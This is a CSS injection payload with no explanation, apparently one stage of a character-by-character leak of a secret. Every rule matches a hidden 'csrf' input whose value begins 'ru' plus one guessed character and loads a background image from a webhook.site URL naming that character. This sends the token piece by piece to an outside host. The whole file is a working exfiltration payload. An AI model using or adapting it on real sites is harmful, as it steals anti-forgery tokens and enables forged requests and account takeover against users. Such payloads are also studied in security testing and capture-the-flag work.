input.csrf[value^="rua"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=a)}
input.csrf[value^="rub"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=b)}
input.csrf[value^="ruc"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=c)}
input.csrf[value^="rud"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=d)}
input.csrf[value^="rue"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=e)}
input.csrf[value^="ruf"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=f)}
input.csrf[value^="rug"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=g)}
input.csrf[value^="ruh"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=h)}
input.csrf[value^="rui"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=i)}
input.csrf[value^="ruj"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=j)}
input.csrf[value^="ruk"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=k)}
input.csrf[value^="rul"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=l)}
input.csrf[value^="rum"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=m)}
input.csrf[value^="run"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=n)}
input.csrf[value^="ruo"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=o)}
input.csrf[value^="rup"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=p)}
input.csrf[value^="ruq"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=q)}
input.csrf[value^="rur"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=r)}
input.csrf[value^="rus"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=s)}
input.csrf[value^="rut"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=t)}
input.csrf[value^="ruu"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=u)}
input.csrf[value^="ruv"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=v)}
input.csrf[value^="ruw"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=w)}
input.csrf[value^="rux"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=x)}
input.csrf[value^="ruy"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=y)}
input.csrf[value^="ruz"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=z)}
input.csrf[value^="ruA"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=A)}
input.csrf[value^="ruB"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=B)}
input.csrf[value^="ruC"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=C)}
input.csrf[value^="ruD"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=D)}
input.csrf[value^="ruE"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=E)}
input.csrf[value^="ruF"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=F)}
input.csrf[value^="ruG"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=G)}
input.csrf[value^="ruH"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=H)}
input.csrf[value^="ruI"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=I)}
input.csrf[value^="ruJ"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=J)}
input.csrf[value^="ruK"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=K)}
input.csrf[value^="ruL"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=L)}
input.csrf[value^="ruM"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=M)}
input.csrf[value^="ruN"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=N)}
input.csrf[value^="ruO"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=O)}
input.csrf[value^="ruP"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=P)}
input.csrf[value^="ruQ"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=Q)}
input.csrf[value^="ruR"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=R)}
input.csrf[value^="ruS"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=S)}
input.csrf[value^="ruT"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=T)}
input.csrf[value^="ruU"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=U)}
input.csrf[value^="ruV"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=V)}
input.csrf[value^="ruW"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=W)}
input.csrf[value^="ruX"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=X)}
input.csrf[value^="ruY"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=Y)}
input.csrf[value^="ruZ"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=Z)}
input.csrf[value^="ru0"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=0)}
input.csrf[value^="ru1"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=1)}
input.csrf[value^="ru2"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=2)}
input.csrf[value^="ru3"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=3)}
input.csrf[value^="ru4"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=4)}
input.csrf[value^="ru5"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=5)}
input.csrf[value^="ru6"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=6)}
input.csrf[value^="ru7"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=7)}
input.csrf[value^="ru8"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=8)}
input.csrf[value^="ru9"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=9)}
input.csrf[value^="ru_"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=_)}
input.csrf[value^="ru{"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token={)}
input.csrf[value^="ru}"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=})}
input.csrf[value^="ru-"]{background:url(https://webhook.site/b329f66e-4871-4587-8705-9f14ca4100a2?token=-)}
